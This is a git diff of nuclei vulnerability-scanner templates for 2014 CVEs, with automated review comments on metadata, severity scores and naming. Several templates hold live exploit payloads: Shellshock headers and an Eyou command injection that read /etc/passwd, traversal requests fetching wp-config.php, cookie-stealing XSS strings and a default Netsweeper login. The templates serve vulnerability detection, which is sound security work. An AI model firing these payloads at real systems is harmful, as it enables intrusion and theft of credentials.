diff --git a/nuclei-templates/CVE-2014/cve-2014-4561.yaml b/nuclei-templates/CVE-2014/CVE-2014-4561.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4561.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4561.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-4592.yaml b/nuclei-templates/CVE-2014/CVE-2014-4592.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4592.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4592.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-4940.yaml b/nuclei-templates/CVE-2014/CVE-2014-4940.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4940.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4940.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-5368.yaml b/nuclei-templates/CVE-2014/CVE-2014-5368.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-5368.yaml rename to nuclei-templates/CVE-2014/CVE-2014-5368.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-6271.yaml b/nuclei-templates/CVE-2014/CVE-2014-6271.yaml deleted file mode 100644 index 1950dd9db6..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-6271.yaml +++ /dev/null 
@@ -1,44 +0,0 @@ -id: CVE-2014-6271 -info: - name: ShellShock - Remote Code Execution - author: pentest_swissky,0xelkomy - severity: critical - description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-6271 - - https://nvd.nist.gov/vuln/detail/CVE-2014-7169 - - http://www.kb.cert.org/vuls/id/252743 - - http://www.us-cert.gov/ncas/alerts/TA14-268A - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2014-6271 - cwe-id: CWE-78 - tags: cve,cve2014,rce,shellshock -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/cgi-bin/status" - - "{{BaseURL}}/cgi-bin/stats" - - "{{BaseURL}}/cgi-bin/test" - - "{{BaseURL}}/cgi-bin/status/status.cgi" - - "{{BaseURL}}/test.cgi" - - "{{BaseURL}}/debug.cgi" - - "{{BaseURL}}/cgi-bin/test-cgi" - headers: - Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - part: body - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/CVE-2014-6287.yaml b/nuclei-templates/CVE-2014/CVE-2014-6287.yaml index a7bfe291ae..5b7d648f67 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-6287.yaml 
+++ b/nuclei-templates/CVE-2014/CVE-2014-6287.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Upgrade to the latest version of HTTP File Server (>=2.3c) to mitigate this vulnerability. reference: @@ -20,7 +22,7 @@ info: cve-id: 'CVE-2014-6287' cwe-id: CWE-94 epss-score: 0.97289 - epss-percentile: 0.99836 + epss-percentile: 0.99851 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: rejetto product: http_file_server shodan-query: http.favicon.hash:2124459909 - tags: packetstorm,msf,cve,cve2014,hfs,rce,kev + tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto variables: str1: '{{rand_base(6)}}' str2: 'CVE-2014-6287' @@ -55,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee4e28743928fd3468858d40cf0ba1a69f5b4d4715c0c0756653a8b893a569e0022100991770e7b0ceb87ec02a96a8f1a703610d66e8269d2d91752c5b1ad090ee74d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204bde1c3f42a0592f723d6907f857453ffc1cbaeade6b35e9f6d475fdbdf132c9022100e2f30a443e5904e106b93955a85dde211a5249aead2a75f789325c42c40efadc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/CVE-2014-8676.yaml b/nuclei-templates/CVE-2014/CVE-2014-8676.yaml index c489321ae5..2eb92670c9 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-8676.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-8676.yaml 
@@ -6,19 +6,31 @@ info: severity: medium description: | SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. + remediation: | + Upgrade Simple Online Planning Tool to version 1.3.2 or higher to fix the Local File Inclusion vulnerability. reference: - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html - https://www.exploit-db.com/exploits/37604/ - http://seclists.org/fulldisclosure/2015/Jul/44 - https://nvd.nist.gov/vuln/detail/CVE-2014-8676 + - http://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2014-8676 cwe-id: CWE-22 - tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi + epss-score: 0.00195 + epss-percentile: 0.56456 + cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: soplanning + product: soplanning + tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss -requests: +http: - method: GET path: - "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd" @@ -32,5 +44,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs on 2022/09/09 +# digest: 490a0046304402206611bdf8fb4c40e1d04dce364dce4905c11bbe2266ca7465719b55cf98d7949602207babdd83687bb04e4175613fe704b5c7b653537bbc366a9c8822e295b1cf16fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/CVE-2014-8799.yaml b/nuclei-templates/CVE-2014/CVE-2014-8799.yaml index 954edb69fb..2fff64b065 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-8799.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-8799.yaml 
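Review bot: The reference added to `CVE-2014-8676.yaml`, `http://packetstormsecurity.com/files/132654/...`, duplicates the `https://` entry already first in the list; drop one of them. The `tags` line gains `xss` although the template sends only the `fichier` traversal request and matches on passwd content, so the tag misdescribes the check — leave it at `lfi` unless an XSS request is added. The new `remediation` says "1.3.2 or higher" while the context description says "<1.32"; confirm which spelling is the product's version and use it in both places.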
@@ -1,21 +1,20 @@ id: CVE-2014-8799 + info: name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal author: daffainfo severity: high - description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. + description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-8799 - https://www.exploit-db.com/exploits/35346 - https://www.cvedetails.com/cve/CVE-2014-8799 - - https://wordpress.org/plugins/dukapress/changelog/ - classification: - cve-id: CVE-2014-8799 tags: cve,cve2014,wordpress,wp-plugin,lfi + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php" + matchers-condition: and matchers: - type: word @@ -26,8 +25,7 @@ requests: - "DB_HOST" part: body condition: and + - type: status status: - 200 - -# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/CVE-2014-9094.yaml b/nuclei-templates/CVE-2014/CVE-2014-9094.yaml deleted file mode 100644 index 76c3724399..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-9094.yaml +++ /dev/null 
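Review bot: This hunk removes the `classification:` block with `cve-id: CVE-2014-8799` and the `https://nvd.nist.gov/vuln/detail/CVE-2014-8799` reference, which runs against the direction of the rest of this commit, where sibling templates (CVE-2014-9119, CVE-2014-9180) gain classification, CPE and EPSS fields; the same removal of `classification:` and a packetstorm reference appears in CVE-2015-2068. Unless these templates are about to be regenerated from another source, keep `  classification:` / `    cve-id: CVE-2014-8799` and the NVD link as they were. The template also stays on the legacy `requests:` key while neighbouring hunks migrate to `http:`.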
@@ -1,24 +0,0 @@ -id: CVE-2014-9094 -info: - name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting - author: daffainfo - severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 - tags: cve,2014,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2014/CVE-2014-9119.yaml b/nuclei-templates/CVE-2014/CVE-2014-9119.yaml index eea1760029..7f9333b458 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-9119.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-9119.yaml 
@@ -3,22 +3,35 @@ id: CVE-2014-9119 info: name: WordPress DB Backup <=4.5 - Local File Inclusion author: dhiyaneshDK - severity: high + severity: medium description: | WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. + impact: | + Allows an attacker to read arbitrary files on the server. + remediation: | + Update WordPress DB Backup plugin to version 4.6 or higher. reference: - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536 - https://www.exploit-db.com/exploits/35378 - https://nvd.nist.gov/vuln/detail/CVE-2014-9119 - https://wpvulndb.com/vulnerabilities/7726 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/99368 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-9119 cwe-id: CWE-22 - tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb + epss-score: 0.11639 + epss-percentile: 0.95149 + cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: db_backup_project + product: db_backup + framework: wordpress + tags: cve2014,cve,lfi,wordpress,wp-plugin,wp,backup,wpscan,edb,db_backup_project -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php' @@ -35,5 +48,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/05 +# digest: 490a0046304402200ab09228c893b1ee93d8eef722707d966f04b94eaf2b6979ef784accbbca3cd20220253e29578ffae76a82b5b19b0a066d92ae8ebcc1950101953d4b994cd366b495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
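Review bot: The hunk replaces a CVSS v3.0 vector and score 7.5 with a CVSS v2.0 vector and score 5 and lowers severity from high to medium to match; CVE-2014-4942 and CVE-2015-1579 receive the same v3-to-v2 downgrade in this commit. Presumably this mirrors NVD, which carries only v2 data for many 2014–2015 CVEs, but swapping a v3 vector for a v2 one discards information, so if the v3 vector originally came from a vendor or third-party scoring it should be retained rather than overwritten. Separately, `cvss-score: 5` here versus `9.80` and `6.10` in other templates of this commit shows two numeric formats in play; settle on one (e.g. `5.0`).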
diff --git a/nuclei-templates/CVE-2014/CVE-2014-9180.yaml b/nuclei-templates/CVE-2014/CVE-2014-9180.yaml index 1e5f5efc3e..faf2b9414d 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-9180.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-9180.yaml @@ -12,16 +12,20 @@ info: - https://packetstormsecurity.com/files/129087/Eleanor-CMS-Open-Redirect.html - https://nvd.nist.gov/vuln/detail/CVE-2014-9180 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/Au:N/C:N/I:P/A:N - cvss-score: 5.0 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N + cvss-score: 5 cve-id: CVE-2014-9180 cwe-id: CWE-601 + epss-score: 0.00285 + epss-percentile: 0.6809 + cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:* metadata: verified: true - product: eleanor_cms + max-request: 1 vendor: eleanor-cms + product: eleanor_cms shodan-query: html:"eleanor" - tags: cve,cve2014,eleanor,cms,redirect + tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms http: - method: GET @@ -33,3 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 490a004630440220446a71d044997875a6e25df63044f0a0857752c262af93c4d2ad395a2e57d16c0220515a5679ead82478d29fb9a3415e6a433b25596bd8f56f8aabdb0724757cd73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/cve-2014-9444.yaml b/nuclei-templates/CVE-2014/CVE-2014-9444.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9444.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9444.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-9606.yaml b/nuclei-templates/CVE-2014/CVE-2014-9606.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9606.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9606.yaml 
diff --git a/nuclei-templates/CVE-2014/cve-2014-9607.yaml b/nuclei-templates/CVE-2014/CVE-2014-9607.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9607.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9607.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-9608.yaml b/nuclei-templates/CVE-2014/CVE-2014-9608.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9608.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9608.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-9614.yaml b/nuclei-templates/CVE-2014/CVE-2014-9614.yaml index 0f3b8b89a7..19acbf289c 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-9614.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-9614.yaml @@ -1,19 +1,20 @@ id: CVE-2014-9614 + info: name: Netsweeper 4.0.5 - Default Weak Account author: daffainfo severity: critical - description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. + description: The Web Panel in Netsweeper before 4.0.5 has a default password of branding for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9614 - - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2014-9614 cwe-id: CWE-798 tags: cve,cve2021,netsweeper,default-login + requests: - raw: - | 
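Review bot: `tags: cve,cve2021,netsweeper,default-login` is only a context line here, but the year tag is wrong for a 2014 CVE and this hunk already touches the adjacent lines, so it is the place to fix it: `tags: cve,cve2014,netsweeper,default-login`. The change from `cvss-score: 9.8` to `9.80` is inconsistent with the new CVE-2014-1203 template in the same commit, which uses `9.8`. Dropping the `Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html` advisory removes the only human-readable write-up while the `.tgz` download link is kept; I would keep the advisory and drop the archive instead.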
@@ -23,20 +24,21 @@ requests: Referer: {{BaseURL}}/webadmin/start/ login=branding&password=branding&Submit=Login + matchers-condition: and matchers: - type: status status: - 302 + - type: word part: header words: - 'Location: ../common/' - 'Location: ../start/' condition: or + - type: word part: header words: - 'Set-Cookie: webadminU=' - -# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/cve-2014-9617.yaml b/nuclei-templates/CVE-2014/CVE-2014-9617.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9617.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9617.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-9618.yaml b/nuclei-templates/CVE-2014/CVE-2014-9618.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9618.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9618.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-1203.yaml b/nuclei-templates/CVE-2014/cve-2014-1203.yaml new file mode 100644 index 0000000000..ac36dc0e9f --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-1203.yaml 
@@ -0,0 +1,51 @@ +id: CVE-2014-1203 + +info: + name: Eyou E-Mail <3.6 - Remote Code Execution + author: pikpikcu + severity: critical + description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Upgrade to a patched version of Eyou E-Mail <3.6 or apply the necessary security patches. + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + - https://nvd.nist.gov/vuln/detail/CVE-2014-1203 + - http://seclists.org/fulldisclosure/2014/Jan/32 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2014-1203 + cwe-id: CWE-77 + epss-score: 0.02045 + epss-percentile: 0.88732 + cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: eyou + product: eyou + tags: cve2014,cve,seclists,rce,eyou + +http: + - raw: + - | + POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type='|cat /etc/passwd||' + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100cf1d735e7a763f8e92cbac05244f4058513dca66d977cff22094bf53df82ef05022100d45e86c3b9bc7f43e3339b4eb92a91b8f83331a6ecedfa3cbf9dee6a49453580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/CVE-2014-2383.yaml b/nuclei-templates/CVE-2014/cve-2014-2383.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-2383.yaml rename to nuclei-templates/CVE-2014/cve-2014-2383.yaml 
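Review bot: The new `remediation:` text `Upgrade to a patched version of Eyou E-Mail <3.6 or apply the necessary security patches.` is self-contradictory, since `<3.6` is the vulnerable range given by `name:` and `description:`; suggest `Upgrade Eyou E-Mail to version 3.6 or later.` The description attributes CVE-2014-1203 to the `domain` parameter of `admin/domain/ip_login_set/d_ip_login_get.php`, whereas the request in the template posts a `type` parameter to `/webadm/?q=moni_detail.do&action=gragh`; one of the two appears to describe a different issue, so the mapping between this probe and the CVE should be confirmed and stated in the description. The file is added as lowercase `cve-2014-1203.yaml` with `id: CVE-2014-1203`, while the same commit renames other files to the uppercase form. The `github.com/ARPSyndicate/cvemon` and `kenzer-templates` links are aggregator indexes rather than primary sources; the same links are added to CVE-2015-1000005 and CVE-2015-20067 in this commit.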
diff --git a/nuclei-templates/CVE-2014/CVE-2014-2908.yaml b/nuclei-templates/CVE-2014/cve-2014-2908.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-2908.yaml rename to nuclei-templates/CVE-2014/cve-2014-2908.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-3120.yaml b/nuclei-templates/CVE-2014/cve-2014-3120.yaml index 875767dcaf..2e3eb0f6e1 100644 --- a/nuclei-templates/CVE-2014/cve-2014-3120.yaml +++ b/nuclei-templates/CVE-2014/cve-2014-3120.yaml @@ -1,14 +1,16 @@ -id: cve-2014-3120 +id: CVE-2014-3120 + info: name: ElasticSearch v1.1.1/1.2 RCE author: pikpikcu severity: critical description: | The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. - reference: | + reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 - https://www.elastic.co/blog/logstash-1-4-3-released - tags: cve,cve2014,elastic,rce + tags: cve,cve2014,elastic,rce,elasticsearch + requests: - raw: - | @@ -16,10 +18,7 @@ requests: Host: {{Hostname}} Accept: */* Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 343 { "size": 1, @@ -37,16 +36,19 @@ requests: } } } + matchers-condition: and matchers: - type: word words: - "application/json" part: header + - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2014/CVE-2014-3704.yaml b/nuclei-templates/CVE-2014/cve-2014-3704.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-3704.yaml rename to nuclei-templates/CVE-2014/cve-2014-3704.yaml 
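Review bot: `id:` is changed to `CVE-2014-3120` but the file remains `cve-2014-3120.yaml`, and this commit renames sibling files in both directions (cve-2014-9444 to uppercase, CVE-2014-2383 to lowercase), so the naming convention needs to be settled once rather than per file. The template also keeps the legacy `requests:` key and still has no `classification:` block, unlike the templates this commit migrates to `http:` with cvss/cwe/cpe fields. Loosening the body regex to `root:.*:0:0` is reasonable, but the other templates in this commit use `root:.*:0:0:` with a trailing colon; standardise on one form.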
diff --git a/nuclei-templates/CVE-2014/CVE-2014-4513.yaml b/nuclei-templates/CVE-2014/cve-2014-4513.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-4513.yaml rename to nuclei-templates/CVE-2014/cve-2014-4513.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-4535.yaml b/nuclei-templates/CVE-2014/cve-2014-4535.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-4535.yaml rename to nuclei-templates/CVE-2014/cve-2014-4535.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-4536.yaml b/nuclei-templates/CVE-2014/cve-2014-4536.yaml new file mode 100644 index 0000000000..d226a920db --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-4536.yaml 
@@ -0,0 +1,37 @@ +id: CVE-2014-4536 + +info: + name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: + - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f + - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 + tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4536 + cwe-id: CWE-79 + description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter." + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2014/cve-2014-4942.yaml b/nuclei-templates/CVE-2014/cve-2014-4942.yaml index f3a59d9039..bfad79553c 100644 --- a/nuclei-templates/CVE-2014/cve-2014-4942.yaml +++ b/nuclei-templates/CVE-2014/cve-2014-4942.yaml 
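Review bot: `name:` says `< 1.5.7` while `description:` says `before 1.5.6`; one of the two version bounds is wrong and should be aligned with the advisory referenced. The new template uses the legacy `requests:` key that the rest of the commit migrates away from, formats the score as `6.10` rather than `6.1`, and places `classification:` after `tags:` unlike the other templates. The first body word matcher appears here as `'">'`; if that is the committed value it is too generic to confirm reflection and should carry the full injected marker, but if this rendering stripped angle-bracketed content the matcher should be checked in the actual file rather than from this view.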
@@ -3,21 +3,35 @@ id: CVE-2014-4942 info: name: WordPress EasyCart <2.0.6 - Information Disclosure author: DhiyaneshDk - severity: low + severity: medium description: | WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. + impact: | + An attacker can gain sensitive information from the target system. + remediation: | + Upgrade to WordPress EasyCart version 2.0.6 or later. reference: - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150 - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942 - https://nvd.nist.gov/vuln/detail/CVE-2014-4942 + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=829290%40wp-easycart&old=827627%40wp-easycart&sfp_email=&sfph_mail= classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-4942 cwe-id: CWE-200 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure + epss-score: 0.01024 + epss-percentile: 0.82199 + cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: levelfourdevelopment + product: wp-easycart + framework: wordpress + tags: cve2014,cve,wpscan,wordpress,wp-plugin,wp,phpinfo,disclosure,levelfourdevelopment -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php" @@ -41,5 +55,4 @@ requests: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' - -# Enhanced by mp on 2022/09/30 +# digest: 490a004630440220342dce47a8408c74a401ff37d16e9bdac22e456deb97b98dd0c3c7b4b7daed5702206190335d1ce1d1991a9d8e91c114329267ce0095e548d99dd945e381ab003da3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2014/cve-2014-6271.yaml b/nuclei-templates/CVE-2014/cve-2014-6271.yaml new file mode 100644 index 0000000000..6c5db06412 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-6271.yaml @@ -0,0 +1,44 @@ +id: CVE-2014-6271 + +info: + name: Shellshock + author: pentest_swissky + severity: critical + description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications + reference: + - http://www.kb.cert.org/vuls/id/252743 + - http://www.us-cert.gov/ncas/alerts/TA14-268A + tags: cve,cve2014,rce + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2014-6271 + cwe-id: CWE-78 +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/cgi-bin/status" + - "{{BaseURL}}/cgi-bin/stats" + - "{{BaseURL}}/cgi-bin/test" + - "{{BaseURL}}/cgi-bin/status/status.cgi" + - "{{BaseURL}}/test.cgi" + - "{{BaseURL}}/debug.cgi" + - "{{BaseURL}}/cgi-bin/test-cgi" + headers: + Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + + stop-at-first-match: true + matchers-condition: and + matchers: + 